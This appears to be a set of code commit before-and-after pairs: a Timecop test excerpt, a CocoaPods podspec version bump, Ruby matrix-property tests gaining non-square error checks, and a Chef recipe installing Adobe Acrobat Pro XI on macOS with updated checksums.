    Timecop.travel(2008, 10, 10, 10, 10, 10) do
      assert((t - Time.now).abs < 50, "Failed to travel time.")
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.freeze(2008, 9, 9, 9, 9, 9) do
        assert_equal t2, Time.now
      end
      assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
    end
    assert_nil Time.send(:mock_time)
  end

  def test_recursive_freeze_then_travel
    t = Time.local(2008, 10, 10, 10, 10, 10)
    Timecop.freeze(t) do
      assert_equal t, Time.now
      t2 = Time.local(2008, 9, 9, 9, 9, 9)
      Timecop.travel(t2) do
        assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
        assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
      end
      assert_equal t, Time.now
    end
    assert_nil Time.send(:mock_time)
  end
end
|
# CocoaPods spec for TTTRandomizedEnumerator.
Pod::Spec.new do |s|
  s.name     = 'TTTRandomizedEnumerator'
  s.version  = '0.0.1'
  s.license  = 'MIT'
  s.summary  = 'Mix things up in your collection classes with style and class (well, a category, but you get the idea).'
  s.homepage = 'https://github.com/mattt/TTTRandomizedEnumerator'
  s.authors  = { 'Mattt Thompson' => 'm@mattt.me' }
  # NOTE(review): the tag duplicates s.version; :tag => s.version.to_s would
  # keep the two from drifting apart on future version bumps.
  s.source   = { :git => 'https://github.com/mattt/TTTRandomizedEnumerator.git', :tag => '0.0.1' }
  s.source_files = 'TTTRandomizedEnumerator'
  s.requires_arc = true
end
Bumping version to 0.0.2
# CocoaPods spec for TTTRandomizedEnumerator.
Pod::Spec.new do |s|
  s.name     = 'TTTRandomizedEnumerator'
  s.version  = '0.0.2'
  s.license  = 'MIT'
  s.summary  = 'Mix things up in your collection classes with style and class (well, a category, but you get the idea).'
  s.homepage = 'https://github.com/mattt/TTTRandomizedEnumerator'
  s.authors  = { 'Mattt Thompson' => 'm@mattt.me' }
  # Derive the tag from s.version so version and tag cannot drift apart on
  # future bumps (previously both were hard-coded and had to change together).
  s.source   = { :git => 'https://github.com/mattt/TTTRandomizedEnumerator.git', :tag => s.version.to_s }
  s.source_files = 'TTTRandomizedEnumerator'
  s.requires_arc = true
end
|
require "minitest/autorun"
require "csrmatrix"

# Tests the matrix-property predicates of TwoDMatrix (diagonal?, empty?,
# triangularity, singularity, symmetry, etc.) across a handful of fixtures.
class PropertiesTest < Minitest::Test
  def setup
    @matrix = TwoDMatrix.new
    @matrixDense3x3 = TwoDMatrix.new
    @matrixDense3x3.build_from_array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])
    @matrixSparse3x3 = TwoDMatrix.new
    @matrixSparse3x3.build_from_array([[0, 1, 0], [2, 0, 0], [0, 0, 3]])
    # diagonal fixture (-1 on the diagonal); "Trigonal" presumably means
    # diagonal here — TODO confirm naming
    @matrixTrigonal3x3 = TwoDMatrix.new
    @matrixTrigonal3x3.build_from_array([[-1, 0, 0], [0, -1, 0], [0, 0, -1]])
    @matrixEmpty3x3 = TwoDMatrix.new
    @matrixEmpty3x3.build_from_array([[], [], []])
    @matrixZero3x3 = TwoDMatrix.new
    @matrixZero3x3.build_from_array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
    #@matrixHermitian3x3 = TwoDMatrix.new
    #@matrixHermitian3x3.build_from_array([[2, 2+i, 4], [2-i, 3, i], [4, -i, 1]])
  end

  def test_index
    assert_equal 1, @matrixDense3x3.index(1) # first nonzero? entry
  end

  def test_twod_index
    assert_equal 2, @matrixDense3x3.index(2, 1) # row 2 column 1
  end

  def test_invalid_index
    assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(10) }
    assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(4, 3) }
  end

  def test_diagonal
    assert @matrixTrigonal3x3.diagonal?
  end

  def test_empty
    assert @matrixEmpty3x3.empty?
  end

  def test_hermitian
    # FIXME: no imaginary character construction yet
    # assert @matrixHermitian3x3.hermitian()
  end

  def test_lower_triangle
    assert @matrixTrigonal3x3.lower_triangular?
  end

  def test_normal
    assert !@matrixSparse3x3.normal?
  end

  def test_orthogonal
    assert @matrixTrigonal3x3.orthogonal?
  end

  def test_permutation
    assert !@matrixSparse3x3.permutation?
  end

  def test_real
    assert @matrixSparse3x3.real?
  end

  def test_nonsingular
    assert @matrixTrigonal3x3.nonsingular?
  end

  def test_singular
    assert @matrixDense3x3.singular?
  end

  def test_square
    assert @matrixDense3x3.square?
  end

  def test_symmetric
    assert @matrixTrigonal3x3.symmetric?
  end

  def test_unitary
    assert @matrixTrigonal3x3.unitary?
  end

  def test_upper_triangle
    # Fixed copy-paste bug: this previously asserted symmetric? (already
    # covered by test_symmetric) instead of upper_triangular?.
    assert @matrixTrigonal3x3.upper_triangular?
  end

  def test_zero
    assert @matrixZero3x3.zero?
  end
end
Added invalid-input tests verifying that square-only properties raise on non-square matrices.
require "minitest/autorun"
require "csrmatrix"

# Tests the matrix-property predicates of TwoDMatrix (diagonal?, empty?,
# triangularity, singularity, symmetry, etc.), including the
# MatrixDimException raised when a square-only property is queried on a
# non-square matrix.
class PropertiesTest < Minitest::Test
  def setup
    @matrix = TwoDMatrix.new
    @matrixDense3x3 = TwoDMatrix.new
    @matrixDense3x3.build_from_array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])
    @matrixNotSquare2x3 = TwoDMatrix.new
    @matrixNotSquare2x3.build_from_array([[1, 2], [1, 2], [1, 2]])
    @matrixSparse3x3 = TwoDMatrix.new
    @matrixSparse3x3.build_from_array([[0, 1, 0], [2, 0, 0], [0, 0, 3]])
    # diagonal fixture (-1 on the diagonal); "Trigonal" presumably means
    # diagonal here — TODO confirm naming
    @matrixTrigonal3x3 = TwoDMatrix.new
    @matrixTrigonal3x3.build_from_array([[-1, 0, 0], [0, -1, 0], [0, 0, -1]])
    @matrixEmpty3x3 = TwoDMatrix.new
    @matrixEmpty3x3.build_from_array([[], [], []])
    @matrixZero3x3 = TwoDMatrix.new
    @matrixZero3x3.build_from_array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
    #@matrixHermitian3x3 = TwoDMatrix.new
    #@matrixHermitian3x3.build_from_array([[2, 2+i, 4], [2-i, 3, i], [4, -i, 1]])
  end

  def test_index
    assert_equal 1, @matrixDense3x3.index(1) # first nonzero? entry
  end

  def test_twod_index
    assert_equal 2, @matrixDense3x3.index(2, 1) # row 2 column 1
  end

  def test_invalid_index
    assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(10) }
    assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(4, 3) }
  end

  def test_diagonal
    assert @matrixTrigonal3x3.diagonal?
  end

  def test_empty
    assert @matrixEmpty3x3.empty?
  end

  def test_hermitian
    # FIXME: no imaginary character construction yet
    # assert @matrixHermitian3x3.hermitian()
  end

  def test_lower_triangle
    assert @matrixTrigonal3x3.lower_triangular?
  end

  def test_normal
    assert !@matrixSparse3x3.normal?
  end

  def test_invalid_normal
    assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.normal? }
  end

  def test_orthogonal
    assert @matrixTrigonal3x3.orthogonal?
  end

  def test_invalid_orthogonal
    assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.orthogonal? }
  end

  def test_permutation
    assert !@matrixSparse3x3.permutation?
  end

  def test_invalid_permutation
    assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.permutation? }
  end

  def test_real
    assert @matrixSparse3x3.real?
  end

  def test_nonsingular
    assert @matrixTrigonal3x3.nonsingular?
  end

  def test_singular
    assert @matrixDense3x3.singular?
  end

  def test_square
    assert @matrixDense3x3.square?
  end

  def test_symmetric
    assert @matrixTrigonal3x3.symmetric?
  end

  def test_invalid_symmetric
    assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.symmetric? }
  end

  def test_unitary
    assert @matrixTrigonal3x3.unitary?
  end

  def test_invalid_unitary
    assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.unitary? }
  end

  def test_upper_triangle
    # Fixed copy-paste bug: this previously asserted symmetric? (already
    # covered by test_symmetric) instead of upper_triangular?.
    assert @matrixTrigonal3x3.upper_triangular?
  end

  def test_zero
    assert @matrixZero3x3.zero?
  end
end
|
#
# Cookbook Name:: adobe_acrobat_pro_xi
# Recipe:: mac
#
# Copyright 2014, Wesleyan University
#
# All rights reserved - Do Not Redistribute
#
# Installs Adobe Acrobat Pro XI from an internal mirror, applies the latest
# point-release update, adds it to a shared dock folder, and keeps Preview
# as the default PDF handler.

# Install base package
# NOTE(review): the 64-hex digest below is SHA-256-shaped — confirm it
# matches the dmg currently hosted at the source URL.
dmg_package "Adobe Acrobat Pro" do
  app "adobe_acrobat_pro_xi-11.0"
  volumes_dir "adobe_acrobat_pro_xi-11.0"
  dmg_name "adobe_acrobat_pro_xi-11.0"
  source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/adobe_acrobat_pro_xi-11.0.dmg"
  checksum "ad64d83138a3c9ad74b41617f5a3b3e55470f3115806768576ebcc07c94e8822"
  action :install
  type "pkg"
  package_id "com.adobe.acrobat.11.viewer.app.pkg.MUI"
end

# Install latest point release update (11.0.06)
dmg_package "Adobe Acrobat Update" do
  app "AcrobatUpd11006"
  volumes_dir "AcrobatUpd11006"
  dmg_name "AcrobatUpd11006"
  source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/AcrobatUpd11006.dmg"
  checksum "5e2703042d29ba9df03007cbd582e1bff5a58b43abe1c637dcb891d581b25d5d"
  action :install
  type "pkg"
  package_id "com.adobe.acrobat.a11.AcrobatUpd11006"
end

# Download icon used for the dock folder below
cookbook_file "/tmp/adobe.png"

# Create a shared "Adobe Creative Suite 6" folder in every user's dock
dock_add "Adobe Creative Suite 6" do
  all_users true
  action :folder_create
  show_as "list"
  display_as "folder"
  arrangement "name"
  icon "/tmp/adobe.png"
end

# Add Acrobat to that dock folder
dock_add "/Applications/Adobe Acrobat XI Pro/Adobe Acrobat Pro.app" do
  all_users true
  group "Adobe Creative Suite 6"
  restart true
end

# Keep Preview as the default viewer for PDFs
launch_association_set_file_handler "com.adobe.pdf" do
  bundle_id "com.apple.Preview"
  all_users true
end
Updated SHA-1 for Acrobat Pro
Rebuilt pkg with Adobe Customization Wizard to fix issues.
#
# Cookbook Name:: adobe_acrobat_pro_xi
# Recipe:: mac
#
# Copyright 2014, Wesleyan University
#
# All rights reserved - Do Not Redistribute
#
# Installs Adobe Acrobat Pro XI from an internal mirror, applies the latest
# point-release update, adds it to a shared dock folder, and keeps Preview
# as the default PDF handler.

# Install base package (pkg rebuilt with the Adobe Customization Wizard;
# checksum updated to match the rebuilt dmg)
dmg_package "Adobe Acrobat Pro" do
  app "adobe_acrobat_pro_xi-11.0"
  volumes_dir "adobe_acrobat_pro_xi-11.0"
  dmg_name "adobe_acrobat_pro_xi-11.0"
  source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/adobe_acrobat_pro_xi-11.0.dmg"
  checksum "9dc74ec4dc7fe8724d9f8db12413c54f54a9a17840b52e7af15212c8aaf3ffb3"
  action :install
  type "pkg"
  package_id "com.adobe.acrobat.11.viewer.app.pkg.MUI"
end

# Install latest point release update (11.0.06)
dmg_package "Adobe Acrobat Update" do
  app "AcrobatUpd11006"
  volumes_dir "AcrobatUpd11006"
  dmg_name "AcrobatUpd11006"
  source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/AcrobatUpd11006.dmg"
  checksum "5e2703042d29ba9df03007cbd582e1bff5a58b43abe1c637dcb891d581b25d5d"
  action :install
  type "pkg"
  package_id "com.adobe.acrobat.a11.AcrobatUpd11006"
end

# Download icon used for the dock folder below
cookbook_file "/tmp/adobe.png"

# Create a shared "Adobe Creative Suite 6" folder in every user's dock
dock_add "Adobe Creative Suite 6" do
  all_users true
  action :folder_create
  show_as "list"
  display_as "folder"
  arrangement "name"
  icon "/tmp/adobe.png"
end

# Add Acrobat to that dock folder
dock_add "/Applications/Adobe Acrobat XI Pro/Adobe Acrobat Pro.app" do
  all_users true
  group "Adobe Creative Suite 6"
  restart true
end

# Keep Preview as the default viewer for PDFs
launch_association_set_file_handler "com.adobe.pdf" do
  bundle_id "com.apple.Preview"
  all_users true
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.